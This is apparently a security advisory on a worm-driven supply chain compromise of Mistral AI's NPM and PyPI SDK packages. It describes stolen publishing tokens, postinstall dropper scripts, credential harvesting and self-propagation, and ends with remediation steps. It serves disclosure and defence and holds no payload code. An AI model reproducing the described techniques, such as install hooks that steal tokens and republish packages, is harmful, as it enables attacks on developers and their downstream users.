GHSA-JGG6-4RPR-WFH7: Mistral AI SDK Supply Chain Compromise via Mini Shai-Hulud Worm

The vulnerability represents a direct supply chain compromise affecting the official software development kits published by Mistral AI. The attack surface encompasses developer workstations, CI/CD pipelines, and any downstream systems consuming the affected dependencies from the NPM and PyPI registries.

The impacted components include multiple @mistralai scoped packages on NPM, specifically @mistralai/mistralai, @mistralai/mistralai-azure, and @mistralai/mistralai-gcp. A parallel compromise occurred in the Python ecosystem, affecting the mistralai package version 2.4.6 on PyPI.

The root cause was not a flaw in the Mistral SDK codebase itself, but rather the compromise of the software distribution pipeline. An automated worm utilized stolen authentication tokens to masquerade as an authorized maintainer, subverting the trust controls inherent in package management ecosystems.

The initial vector of the compromise traces back to a third-party developer ecosystem. The automated worm, designated 'Mini Shai-Hulud', originally targeted maintainers of the TanStack project. The worm acquired access to developer environments by stealing authentication tokens and session cookies associated with NPM and PyPI registries.

A Mistral AI developer held maintainer privileges for both the targeted third-party libraries and official Mistral AI repositories. The worm compromised this specific developer's local environment, granting the malware administrative access to Mistral's package publishing pipeline.

Once the local environment was compromised, the worm autonomously enumerated all packages for which the infected developer possessed publishing rights. It then initiated automated uploads of new package versions containing the embedded malicious payload, bypassing manual code review processes.

The injected payload varied in functionality depending on the target ecosystem. The malicious code published to the @mistralai NPM packages functioned as a dropper, designed to fetch and execute a secondary payload from a remote command-and-control server.

Analysis from multiple security vendors confirmed that the NPM variant of the dropper was broken. Execution failures within the post-install script prevented the final malware stage from running successfully on many victim machines. This execution failure mitigated the immediate technical impact for NPM consumers.

Conversely, the PyPI payload embedded within mistralai==2.4.6 was fully functional. This variant successfully executed its primary objectives, which included credential exfiltration and the subsequent propagation of the worm to newly infected developer environments.

The attack methodology relies entirely on subverting developer trust and manipulating package manager behaviors. The worm hooks into the installation phase of the package lifecycle. For NPM, this typically involves defining a preinstall or postinstall script within the malicious package.json.

When a victim executes a standard installation command, the package manager inadvertently triggers the worm's bootstrap script. The script immediately attempts to spawn a hidden shell process to execute encoded instructions or initiate network connections to external infrastructure.

The fully functional PyPI payload actively scans the local environment for configuration files, environment variables, and SSH keys. It targets high-value secrets, particularly authentication tokens that allow the worm to authenticate against version control systems and package registries to continue its lateral movement.

Successful execution of the functional payload results in a total loss of confidentiality and integrity for the infected environment. The attacker gains the capability to execute arbitrary code with the privileges of the user invoking the package manager.

The primary objective of the payload is credential theft. Any secrets, API keys, or environment variables present on the compromised system must be considered compromised. Specifically, the MISTRAL_API_KEY is at high risk of exfiltration, leading to unauthorized resource consumption and potential data exposure on the Mistral AI platform.

Forensic investigations by Mistral AI concluded that their internal infrastructure and production systems were not compromised during this incident. The blast radius was strictly limited to systems consuming the affected package versions published via the single compromised developer account.

Immediate remediation requires verifying installed package versions across all projects. Development and security teams must audit package.json, package-lock.json, and requirements.txt files for any @mistralai scoped dependencies or the mistralai Python package updated around May 12, 2025.

If compromised versions are identified, they must be removed, and systems updated to the latest available clean versions published after the incident. Developers must forcefully purge local package caches to prevent accidental re-installation of the malicious artifacts.

# Purge NPM cache forcefully
npm cache clean --force
 
# Reinstall dependencies
npm install

Credential rotation is mandatory for any environment that executed the compromised packages. Administrators must immediately revoke and reissue all secrets, API keys, and specifically any MISTRAL_API_KEY instances that were accessible to the affected system during the vulnerability window.